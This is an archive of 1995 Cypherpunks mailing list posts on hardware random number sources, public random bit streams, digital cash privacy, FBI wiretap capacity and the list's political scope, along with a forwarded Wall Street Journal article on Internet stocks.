~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 5 Nov 1995 02:16:09 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: alt.anonymous.messages considered harmful
Message-ID: <199511032022.PAA03575@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


> >Specifically, if HTTP transactions with
> >a popular web server were routinely encrypted, then all reasonably long
> >visits to that site would act as cover traffic for a message pool on that
> >server.
> 
> Qua?  The "length" of the visit is just the time to download a document.
> Leaving a page in the browser window doesn't generate traffic...

You're absolutely right. I wasn't thinking sensibly about HTTP.  I wanted to
make an argument about the time it would take to search the pool and serve a
results page. But upon reflection, I don't think that even holds up under my
HTTP delusions of yesterday, let alone a realistic view. Please ignore the
"reasonably long" part of my previous statement. Thanks for pointing that out.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Sat, 4 Nov 1995 12:59:49 +0800
To: cypherpunks@toad.com
Subject: Re: Sources of randomness
Message-ID: <199511032324.PAA22269@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm puzzled by the implication that thermal noise or avalanche or Zener
noise is somehow inferior to noise from radioactive sources.  It's not.

Take as an example Johnson noise, the voltage noise from a
resistance.  It's the result of the interaction of vast numbers
of electrons.  It is unpredictable in the same way that individual
radioactive decay events are unpredictable, and they are both
results of friendly quantum mechanics.

Small biases/interferences that come from nonideally sampling such
voltages do not matter, since the entropy is still 1-epsilon bits per
sample (more for nonbinary samples).  There is no "chink in the
armor" available for cryptanalysis---the user need only acquire
N*(1+epsilon) random bits rather than N bits.

The video-snow-noise described by Tim May is mostly Johnson noise
in the low-noise-amplifier electonics, not atmospheric or ionospheric
noise, at least above 50 MHz or so.

Cheers,
Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Fri, 3 Nov 1995 16:34:17 +0800
To: bryce@colorado.edu
Subject: Re: [NOISE] Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511030614.XAA02702@nagina.cs.colorado.edu>
Message-ID: <Pine.LNX.3.91.951103152502.23689A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 2 Nov 1995, Bryce wrote:

> That's one way to look at it.  Of course since the "license 
> requirements" had to do with some obscure administrivia that nobody
> thought would apply to ISP's, none of the 6 or so ISP's in Hong Kong
> had thought to apply for it.  One has to wonder why the gov't pulled
> the plug on 5 of them without so much as a warning, much less a
> chance to comply.
> 
> 
> Did I say 5?  Oh yes.  The largest HK ISP-- and the one with closest
> ties to the government-- had gone ahead and applied for the license
> just a couple of weeks before the blackout.  Corruption is the modus
> operandi in HK, so I wouldn't be at all surprised if that one ISP
> got a special favor by being warned of the impending black-out, or
> even if it had a hand in instigating it.

Look: I've followed very closely all that sad story, as I routinely 
participate to the meetings between the Government's Telecom regulator 
(OFTA) and the representatives of the IT industry regarding ISP 
regulations and the difficult relationships with the telephone carrier 
(in the role, incidentally, of a strong advocate of de-regulation). 

The cutoff was determined by an initiative of the Police's Commercial
Crime Bureau, tipped by complaints from that provider you're mentioning
(HK Supernet). The initiative was taken without any pressure from above,
and actually the CCB had to backpedal very hurriedly after the
intervention of several legislators (I assisted to an embarassing panel
meeting where one of them scolded the chief of the CCB and advanced the
hypothesis of a possible lawsuit by the providers agaist the Government
for unlawful action, due to a few clumsy procedural "faux pas" by the
police). In other words, the whole matter looked more like "Inspector
Clouseau vs the ISP's" than a perfidious conspiracy to suppress the
freedom of speech. 

In any case, before Perry (rightly) send us stern reminders of the scarce
crypto relevance of this thread, let's take it out of Cypherpunks and, if
someone is interested, let's continue by e-mail. 

Cheers --

Enzo




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sun, 5 Nov 1995 12:41:59 +0800
To: cypherpunks@toad.com
Subject: Real randomness generators
Message-ID: <9511032132.AA00195@all.net>
MIME-Version: 1.0
Content-Type: text


Two points:

	1 - The noisiest thing on most lists is the noise about other
	peoples' noise.

	2 - Why not use the postings of people complaining about other
	peoples' posts as a source for noise.  Surely few things in the
	Universe are more random.

On the the subject at hand:

	There are two major technical issues I have encountered in using
EM waves (which is what video and radio noise are) for generating
randomness. 

	1 - They tend to be biased toward 1 or 0.  This can often be
	compensated for by (for example) xoring one bit stream from the
	same source with the inverse of another.  By doing this enough
	times, you can eliminate many of the characteristics of interest.

	2 - Noise tends to be characteristic for different media and noise
	causes.  This is a more difficult issue.  For example, certain
	types of media tend toward short noise bursts.  In these cases,
	you have to be quite careful to assure that the bit streams meet
	the randomness criteria of the application.

As a side issue, you may find that once you start sending enough
information with truly random characteristics, you will be visited by
people that don't want you sending it.  I know people who have
experienced these visitations and felt highly constrained as a result.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Sun, 5 Nov 1995 02:10:04 +0800
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Real randomness generators
In-Reply-To: <9511032132.AA00195@all.net>
Message-ID: <Pine.SOL.3.91.951103170926.6180A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 3 Nov 1995, Dr. Frederick B. Cohen wrote:


> 
> As a side issue, you may find that once you start sending enough
> information with truly random characteristics, you will be visited by
> people that don't want you sending it.  I know people who have
> experienced these visitations and felt highly constrained as a result.



C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Sat, 4 Nov 1995 10:00:34 +0800
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Apologies for spam
Message-ID: <Pine.SOL.3.91.951103171035.6180C@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


C-punx

I really didn't mean to send that last message to the list.  I had 
stiffened my resolve not to rise to the obvious troll bait, but a minor 
seizure of some sort resulted in the send command being issued instead of 
the cancel command. . .

By way of making up for it I thought that some of you might be interested 
in knowing that AAAS is having it's annual meeting in Baltimore this year 
and of interest to those pondering alternative means to bruting 
cryptosystems are the sessions below:

DNA Computing, Friday Feb. 9, 8:30 - 11:30 am
Organized by Richard Lipton, Princeton University

Quantum Computation, Friday Feb. 9, 2:30 - 5:30 pm 
Organized by Seth Lloyd, MIT

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 4 Nov 1995 09:40:02 +0800
To: cypherpunks@toad.com
Subject: Re: Many Topics are Appropriate for Discussion Here
In-Reply-To: <acbf9ee00b0210044261@[205.199.118.202]>
Message-ID: <9511032235.AA13095@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hi folks,

	There is a bug in mh mail that causes all mails to be rejected after
there are more than 9999 in the same mailbox. I recieved 100 in two hours
today so I suspect the subject line may well be related to my earlier post.
They mostly fell on the floor. The rest are 50-50 pro/anti.

	Just a calibration point. The libertarians on the list do not seem
to shrink from expressing their political views. Indeed the entire discussion
on the NSA is a political thread pure and simple. My post related directly
to the question of personal privacy rights in a democratic, plural society.
I do not regard that it was off topic in any sense. I was not aware that
any agreement was in effect as to the method by which goals might be 
achieved. I chose to persue goals by the means most likely to succeed. In 
that I am a pragmatist. Government regulation often provides social benefits
it is not by definition an evil to be avoided. In any case regardless of the
rhetoric government regulation increases, I prefer to press for some
regulations I like rather than dream about there being none whatsoever.

	I do not separate the question of politics from technology. My 
reasons for working on the Web have from the start been explicity political.
I regard the persuit of technology without consideration of the political
consequences to be unethical.

	I am only in a position to influence the political process if I
understand the position of the administration and can demonstrate an 
appreciation of their concerns. As Sun Tsu said "you must build a golden
path along which your enemies may retreat". The problem with government
is not that it is a conspiracy, it is an interlocking series of
beuraucracies which all seek to avoid responsibility. 

	If you want to get Phil Z. off the hook or foul up the governments
escrow scheme plans you have tobe prepared to step into their mindset
and walk about on the inside a bit. somewhere inside the government there is
a jobsworth who is deciding to hassle Phil Z., this person will be a civil
servant, not a political appointee. Ie the dregs which get left behind each
time there is a new administration. What we need to do is to identify that 
person and nail their ass to the wall. It has to become apparent to the
administration that that individual has created an unnecessary source of
embarassment. 

	It seems to me that the purpose of key escrow is not to allow the US 
govmt to spy on its citizens. I think they want to stop strong crypto getting 
out because there are still a large number of governments cables they can break 
and they want the fun to continue a while. No external government is going to 
trust a system that is clearly subject to US govt. interference.


	If someone comes up with a crypto proposal to avoid paying taxes I
know it will never get anywhere. If they come up with a crypto proposal that
guarantees that a tax is paid but conceals the identity of the persons
involved I get much more interested.

	If somone makes contiuous political spiels themselves but object when
I make one they disagree with (as one person has done) I am not going to take
their objection as indicating anything other than an inability to argue their
case.

		Phill

PS I'm also none to impressed by people who make comments like "you are wrong 
about XXX but I won't explain why".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 Nov 1995 17:40:02 +0800
To: hallam@w3.org
Subject: Re: Many Topics are Appropriate for Discussion Here
In-Reply-To: <9511032235.AA13095@zorch.w3.org>
Message-ID: <199511032304.SAA00611@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> 	There is a bug in mh mail that causes all mails to be rejected after
> there are more than 9999 in the same mailbox. I recieved 100 in two hours
> today so I suspect the subject line may well be related to my earlier post.

There isn't such a bug in MH, but mhe, if you are using it, won't show
more than that number. Simply split your mailbox and all is well again.

> 	Just a calibration point. The libertarians on the list do not seem
> to shrink from expressing their political views.

I don't express my general political opinions very much at all. As it
turns out, I'm a very radical libertarian, and anyone reading my stuff
elsewhere would know that, but I don't discuss this stuff in public.

> Indeed the entire discussion
> on the NSA is a political thread pure and simple.

This list *is* political in the sense that it is for people who have
chosen the view that the spread of cryptography is good. It is not,
however, a list for just *any* political discussion. The topic is
purely cryptography, and we operate largely from the viewpoint that if
you think crypto is very evil you probably should discuss that
elsewhere.

> Government regulation often provides social benefits
> it is not by definition an evil to be avoided.

I would disagree, but that is a discussion for elsewhere.

> 	If someone comes up with a crypto proposal to avoid paying taxes I
> know it will never get anywhere.

A lot of what Tim May has been talking about here for many years is
the inevitability that cryptography will weaken current financial
controls -- sooner or later, whether the central governments want it
to happen or not.

> PS I'm also none to impressed by people who make comments like "you are wrong
> about XXX but I won't explain why".

I sent you a detailed explanation, in PRIVATE mail, of why you were
wrong about governments being the only way to provide roads, including
lots of counterexamples to your claim. However, this is not libernet,
this is cypherpunks, and this isn't a place for that discussion. Thats
why I sent you PRIVATE mail.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Sat, 4 Nov 1995 15:58:41 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Real randomness generators
In-Reply-To: <9511032132.AA00195@all.net>
Message-ID: <9511032316.AA06015@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


	Dr. Fred writes:

> As a side issue, you may find that once you start sending enough
> information with truly random characteristics, you will be visited by
> people that don't want you sending it.  I know people who have
> experienced these visitations and felt highly constrained as a result.


	Could you possibly elaborate on this ?  Was this overseas
where the NSA might be presumed to be involved or domesticaly ?
(And of course was it in the USA or elsewhere ?)

> 
						Dave Emery 
						die@die.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Fri, 3 Nov 1995 15:55:51 +0800
To: bigmac@digicash.com (Marcel van der Peijl)
Subject: Re: Re: Chaum's cash: backup?
In-Reply-To: <199510241312.OAA00644@digicash.com>
Message-ID: <199511030729.SAA03867@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Marcel van der Peijl,
> From: "Marcel van der Peijl" <bigmac@digicash.com>
> Date:          Tue, 24 Oct 1995 14:10:58 +0100

Sorry about taking so long to reply... I'll quote more than usual
to make up for it.

> > > I could give a hint: your random state initializer is not the too-often 
> > > used srand( time( NULL ) ) but user-chosen during installation.

> > This sounds great... Will the bank be running crack against the proto-coins
> > it gets? (Say, at the behest of a LEA?)

> It is not the bank's intention to screw the clients, but mostly the 
> other way around.

I was referring to the claim that the system is payer-anonymous.

Thinking of it again now, what's to stop Eve the eavesdropper from spying
on the proto-coins, running crack against it, and then (later) 
eavesdropping on the bank-signed coins and unblinding/depositing them 
before Alice/Bob does?

(No, being encrypted by the bank's public key is not enough.)

> If the bank wants to screw the clients the easiest 
> way is to change their account balance. Remember, you trust them with 
> your money. That's why they're a bank.

Yes, but is the bank really interested in protecting privacy?

> > Is there any way for the user to re-initialize the random state?
> > > Write that initializer down and you can re-generate all coins.
> > ...
> > That's going to be one hell of a valuable piece of paper.
> > (Certainly to your enemies/prosecutors - it reveals the blinding factors
> > for every coin you ever spent.)

> You may choose to burn it or change random state and have no 
> recoverability. What do you value more? Your privacy or your money? 
> Each user will have too choose.

a) It would be nice if the protocol didn't require this choice.

b) This choice should be made explicit to the user.

c) As I noted above, wouldn't it also strongly reduce security?


See you!

Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMJnEeCxV6mvvBgf5AQF2BwP/XdMn6ktMGjToDltqo014kT1i3Z/GGXPr
HPW1gBN3RT3Ba9F2Ac+24IVVFqauo1sT+Ecc872UrlQzoF8S524oZfhjh3IW5xRF
mpZX48tnQn5nJE/U4XgvcuQ6yw5JOhc2eEVPs2PnKT+RdUogNb9UDAXOKn6+EILc
nqosNXK+aMU=
=geHb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 5 Nov 1995 01:14:14 +0800
To: Noah Brodbeck <nbrodbeck@hollandhart.com>
Subject: Re: Telephone switch capacity -Reply
In-Reply-To: <s09a7458.054@allegro.net>
Message-ID: <Pine.ULT.3.91.951103182313.3366A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


[about the FBI supposedly wanting the ability to tap 1% of all phones in 
the US simultaneously]

EPIC, CDT, and the original source confirm that they're talking about
capacity, not total circuits. So what the FBI was asking for (not
demanding, certainly not dicatating) by early 1999 (not Oct 1998, because
the ticker starts at the end of the comment period) was between 0.25% and
1% of the 10-20% of lines that the phone system can handle at once, or
between 0.025% and 0.2% of the lines. 

Of course the FBI doesn't have the staff to listen to all these lines, and
they need an individual court order to authorize each individual
interception, so this numbers game is a bit of a joke. 

There is no controversy about the number of wiretaps that have been
authorized, except as manufactured by the Spotlight folks and other
conspiracy loons. The EPIC FOIA request and lawsuit concerns the rationale
for the FBI's capacity request. 

It all makes a little more sense now. I had been wondering what the hell
the FBI had been smoking. Something not quite as strong as the stuff the
Spotlight people are smoking, it turns out. 

The FBI proposal is still Not A Good Thing, and deserves your interest 
and opposition. See http://www.epic.org/privacy/wiretap/oppose_wiretap.html 
for facts and reasonable responses. The CDT's page, at 
http://www.cdt.org/digtel.html, is better.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 01:17:28 +0800
To: cypherpunks@toad.com
Subject: Re: Many Topics are Appropriate for Discussion Here
Message-ID: <acc005a10e02100466ac@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:35 PM 11/3/95, hallam@w3.org wrote:

>        Just a calibration point. The libertarians on the list do not seem
>to shrink from expressing their political views. Indeed the entire discussion
>on the NSA is a political thread pure and simple. My post related directly
>to the question of personal privacy rights in a democratic, plural society.
>I do not regard that it was off topic in any sense. I was not aware that
>any agreement was in effect as to the method by which goals might be
>achieved. I chose to persue goals by the means most likely to succeed. In
>that I am a pragmatist. Government regulation often provides social benefits
>it is not by definition an evil to be avoided. In any case regardless of the
>rhetoric government regulation increases, I prefer to press for some
>regulations I like rather than dream about there being none whatsoever.

I for one have no problem with left-leaning (that is, nonlibertarian :-})
folks expressing views. That libertarians tend to be the most vocal and
perhaps most articulate advocates of strong crypto is only a trend: I know
of several left-leaning folks who strongly push crypto. We happen to
disagree on some points, but agree on others. On this list, Dave Mandl and
Rich Dutcher (probably no longer subscribed) have represented somewhat
leftist views.

The late John Brunner was a particular favorite of mine, whose "Stand on
Zanzibar" was an utter masterpiece, and whose "The Shockwave Rider" was of
course a major influence on many cyberspace privacy advocates. And yet he
called himself a leftist and was strongly opposed to the corporate state.

As I am, by the way. Much of the power of very large corporations comes
from the power of the State enforcing certain franchises and monopolies
granted to them. (Intellectual property laws are largely such
franchises---if one doubts this, imagine a return to the era of the guilds,
where the silversmith's guild could physically block other people from
smithing silver, and so on for all of the guilds. Modern intellectual
property law works mostly the same way, giving to Apple or Sun or Intel the
control a "truly free" market certainly would not.)

>        I do not separate the question of politics from technology. My
>reasons for working on the Web have from the start been explicity political.
>I regard the persuit of technology without consideration of the political
>consequences to be unethical.

I agree. And though I have been called an "ethical monster" for pushing my
agenda for crypto anarchy, I agree that one must always consider ethics and
politics in technological matters. (I suspect we disagree about many
conclusions of this view, however.)

>        I am only in a position to influence the political process if I
>understand the position of the administration and can demonstrate an
>appreciation of their concerns. As Sun Tsu said "you must build a golden
>path along which your enemies may retreat". The problem with government
>is not that it is a conspiracy, it is an interlocking series of
>beuraucracies which all seek to avoid responsibility.

I view governments as just another example of an organism or system which
perpetuates itself. It's in the genes. Evolutionary game theory, etc.

>        If you want to get Phil Z. off the hook or foul up the governments
>escrow scheme plans you have tobe prepared to step into their mindset
>and walk about on the inside a bit. somewhere inside the government there is
>a jobsworth who is deciding to hassle Phil Z., this person will be a civil
>servant, not a political appointee. Ie the dregs which get left behind each
>time there is a new administration. What we need to do is to identify that
>person and nail their ass to the wall. It has to become apparent to the
>administration that that individual has created an unnecessary source of
>embarassment.

This I think we have been already been doing a pretty good job at. I have
been on panel discussions with Stewart Baker, former chief counsel of the
NSA (and now with Steptoe, a D.C. law firm, and still active in pushing
crypto legislation), and Ron Lee, the current chief counsel. And I spotted
Dorothy Denning's deep involvement several years ago. Ditto for key escrow.


And of course John Gilmore, Phil Karn, and others have been very active in
"nailing their asses to the wall," so to speak.

>        If somone makes contiuous political spiels themselves but object when
>I make one they disagree with (as one person has done) I am not going to take
>their objection as indicating anything other than an inability to argue their
>case.

As this post should make clear, I certainly don't object.

I doubt I'll have any energy to argue things I argued for the first time
almost 30 years ago, but I'm very interested in the nuts and bolts of how
strong crypto will affect institutions and policies.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 4 Nov 1995 10:03:16 +0800
To: cypherpunks@toad.com
Subject: Webernet Madne$$
Message-ID: <199511031826.TAA29048@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Wall Street Journal, November 3, 1995


Wall Street is in the throes of Internet mania. Or is it
Internet madness?

Investors have poured into Internet-related stocks in the
past couple of days, pushing some Web darlings such as
Spyglass and Netscape Communications to dizzying new
heights.

"People are blindly investing in anything that says
Internet," said Willian Bluestein, an analyst at
Forrester Research in Cabridge, Mass.

"Everyone wants to buy into the craze," says John
Sebrich, who works with mutual-fund investor Mario
Gabelli. ...

What is the big stampede all about? During the past week
or so, some of the highest-profile, highest-flying
Internet stocks have actually reported profits, a
development the Street wasn't expecting until next year
at best. ...

"The reason Intuit's moving up is the realization that if
you had to do the banking industry over again, you
wouldn't use brick and mortar," said Neal P. Miller,
manager of Fidelity Investments' New Millennium Fund.
"I think the size of this Internet thing is just dawning
on everyone," he said.

Neil Weintraut said, "Money managers are realizing that
there is tremendous strength behind this. It's not just
a technology chasing a marketplace." ... [and more gush]

______________________________________________________

Web and Wild [Chart]
______________________________________________________

                                             Percent
                              Yesterday's    Change
Company                       Close          This Week
______________________________________________________

Spyglass                      $70.50         +70%
Uunet Technologies             67.00         +41%
Netcom Online                  68.63         +30%
Performance Systems            21.25         +30%
Intuit                         82.75         +21%
Netscape                       98.25         +21%
______________________________________________________


-----

European Firms Join Research Group In Bid to Guide
Internet Development

By Douglas Lavin


Paris - - Afraid of being frozen out of the booming
interest in the Internet, 20 European companies joined
together to form the European arm of an Internet research
group.

The World Wide Web Consortium's European branch will work
with the U.S. Web consortium on such global issues as
electronic commerce, but it will also work on such
international issues as the use of languages other than
English on the Web, the multimedia portion of the
Internet.

"We must assure that the beautiful springtime of the
World Wide Web is not also the autumn of the French
language," said Elisabeth Dufourcq, France's secretary of
state for research at a conference here to announce the
creation of the European branch.

Several large European technology firms, including Oy
Nokia of Finland and Siemens AG of Germany, who are
hoping to play a major role in the development of the
Internet here ponied up $150,000 to join the consortium.
Particularly well-represented are telephone companies who
see the Internet as a threat to their ability to control
national voice and data networks. Among the European
members of the consortium, announced at a conference on
the Web here, are British Telecommunications PLC and the
national telecommunications companies of France, Germany,
Italy and Belgium. All five companies either offer or are
planning to offer Internet access.

One of the group's key tasks is to ensure that
improvements made by such rival companies as Netscape
Communications Corp. and Microsoft Corp., both members of
the U.S. consortium, don't create separate parts of the
Internet that can only be read by Microsoft or Netscape
software.

Membership in the European consortium, which is to be
based at the French national computer-research institute,
Inria, also shows a remarkable degree of interest in the
Web by the French business and government establishment,
which only a year ago dismissed the Internet as a
American version of France's Minitel network, but now is
avidly promoting the Internet's growth.
Among the members of the consortium from France are
Assurances Generale de France, the insurance company;
Electricite de France, the electricty company; Cie. des
Machines Bull, the computer maker; Aerospatiale, the
aerospace concern; and Thomson-CSF, the arms
manufacturer, all of them state-controlled, as well as
such private concerns as Alcatel-Alsthom SA and Groupe
Michelin.

Inria, which already has taken over some Web research
work from CERN, the nuclear-research organization in
Switzerland where the Web was created in 1989 by Tim
Berners-Lee.

Mr. Berners-Lee, now at the Massachusetts Institute of
Technology, is heading both the U.S. and the European
research consortia.

[End]

-----


Nuclear research > munitions research > controlled crypto > 
controlled commerce > economic espionage > ten thousand-year 
reign of the PGP-DigiBank-MIT-CERN crypto-commo-libertarian 
nerds.


Phill, what's the admission code to W3 world domination?








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 01:17:09 +0800
To: cypherpunks@toad.com
Subject: [political NON-noise] Re: Crypto & Taxes
Message-ID: <acc00b1210021004adbd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:03 AM 11/4/95, s1113645@tesla.cc.uottawa.ca wrote:

>Not that I want to get into a big political discussion, but David Friedman
>has a nice, calm and rational book called The Machinery of Freedom, 2nd ed,
>which argues anarchism/libertarianism from an economist'spoint of view.
>The argument is not cased in terms of ethics and morals but rather
>economic efficiency and utility. Slim, easy to read and cheap. He also
>has a good sense of humor. Unfortunately the book is currently on back order.
>I'm holding on to my library copy until they ship one to me.

David Friedman is now teaching law at Santa Clara University, over in
Silicon Valley. We've been in contact, and expect to meet for dinner
sometime soon. (He attended a special Cypherpunks meeting a few years ago.)

>You can butt heads with him and Tim on the cyberia list (I don't remember
>the address but they have it at news://nntp.hks.net )

Ah, but the Cyberia list is a _law_ list, and political discussion is
discouraged.

>I gather from the cyphernomicon that someone recently converted him to
>cryptoanarchy.

His "Machinery of Freedom" and many other articles clearly establishes him
as a leader in this area. He didn't previously know a lot about strong
crypto, but now he sees that this makes many of the abstract ideas of
"Machinery" near at hand.

Vernor Vinge believes the same thing.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 4 Nov 1995 10:08:55 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Many Topics are Appropriate for Discussion Here
In-Reply-To: <199511031947.OAA00318@jekyll.piermont.com>
Message-ID: <199511040030.TAA28181@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:
> I don't care about quantity. Steve Bellovin is worth 500 subscribers
> -- maybe 1000. I'd rather hear his or Phil's off the cuff remarks on a
> lot of this stuff than most of what passes for careful thought from
> the average person here.

I have some not-so-hypothetical questions: 

Suppose I have serious and plausibly realistic aspirations to become an 
authority in some subtopic of cryptography, network security, etc. (sometime 
well into the next millenium). Am I more likely to learn and hone my skills
by actively participating (sticking my neck out) or merely lurking
indefinitely ?  Regardless of the answer to the previous question, should
the list suffer me my missteps and naivete ?

I do not consider these questions rhetorical, and the answers are very
important to me on a personal level.

And now I believe I'll shut up for a while.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Sat, 4 Nov 1995 10:17:34 +0800
To: cypherpunks@toad.com
Subject: public random numbers
Message-ID: <01HX7UTFXLK29BWWKZ@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Fri, 03 Nov 1995 00:44:02 -0800
>From: tcmay@got.net (Timothy C. May)
>Subject: Re: video as a source of public randomness
>
>At 6:23 AM 11/3/95, JMKELSEY@delphi.com wrote:
>
>>This seems like a potential source of a stream of public random
>>bits.  If these can be authenticated and matched, this kind of thing
>>can be useful in a lot of protocols.  For example, if there is some
>
>I'm not sure what you mean by "public random bits"...I don't plan to share
>my random bits with anyone, nor do I see any need for "public" random bits
>(except for some well-known situations involving statistical testing, for
>which certain PRNGs are actually preferable to "real" random numbers).

Imagine there is a stream of totally random bits over which neither
Alice nor Bob has any control.  We can use this to make a lot of
interactive protocols non-interactive.

Suppose we have a protocol where we need a random challenge from
Bob.  Alice sends a message to Bob starting the protocol, stating
that the public random bit stream is currently at bit i, and
committing to use the n-bit string starting at position (i+t) as the
challenge.  The t parameter here needs to be large enough to ensure
that Bob receives and logs the message before the public random bit
stream outputs bit i+t.  Alice proceeds with the protocol, using the
n-bit string starting at bit (i+t) as the challenge.  She sends the
resulting message to Bob.  No interaction was required of Bob--he
merely had to log the times of the messages, and keep track of the
public random bits.  This could be really useful implementing
noninteractive digital cash schemes, I think, because the merchant
wouldn't have to send anything back.  (The merchant can also be very
hard to track down by following the messages, since these messages
of Alice's can be encrypted under his public key and posted to a
newsgroup or something, though this implies really large values of
t.)

Naturally, this only works if Alice and Bob get the same random
string, and if it's not possible for anyone to alter the public
random bit string either one receives.  For large-scale
applications, the way to do this is probably to put a hardware RNG
into a communications satellite, and devote one channel to
continuous digitally-signed packets of random data.  For
smaller-scale or underground applications, it might be sufficient to
use some digitized transmission that would probably not be worth the
trouble for an attacker to alter, even if one could.  For example,
if we used the entire digital video feed off some major satellite,
it would be enormously expensive to take control of that for any
length of time, to attack some protocol.  To prevent simple attacks,
we can hash the digitized input, and we can make each shared random
packet dependent on previous packets by some relation like

random_packet[i+1] = SHA1(random_packet[i],SHA1(digital_video_packet[i])).

>And so there's no confusion, when I said "like a noisy channel (t.v.
>channel, for example)" I meant a snowy, noisy picture such as one gets with
>rabbit ears on top of the set, especially when the channel is an unused
>one. It is unlikely in the extreme that any attacker could deduce the snowy
>pixel values used in the distillation of entropy.

I was just thinking of the unintended entropy in the stuff going on
on the screen.  Static would mess this idea up, though there are
some ways to recover.

>But back to the subject of "public random bits." Could you elaborate on
>what you mean by this? (I assume you don't mean a one time pad that Alice
>and Bob share, since that is really a separable issue from video as a
>source of randomness. Only one of them will generate the pad, and will then
>securely communicate it to the other.)

No, of course not.  Public random bits can be used in the derivation
of a shared key, to prevent replay attacks in key-exchange
protocols, but you certainly wouldn't want to use the public random
bits directly as key material!

>--Tim May

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

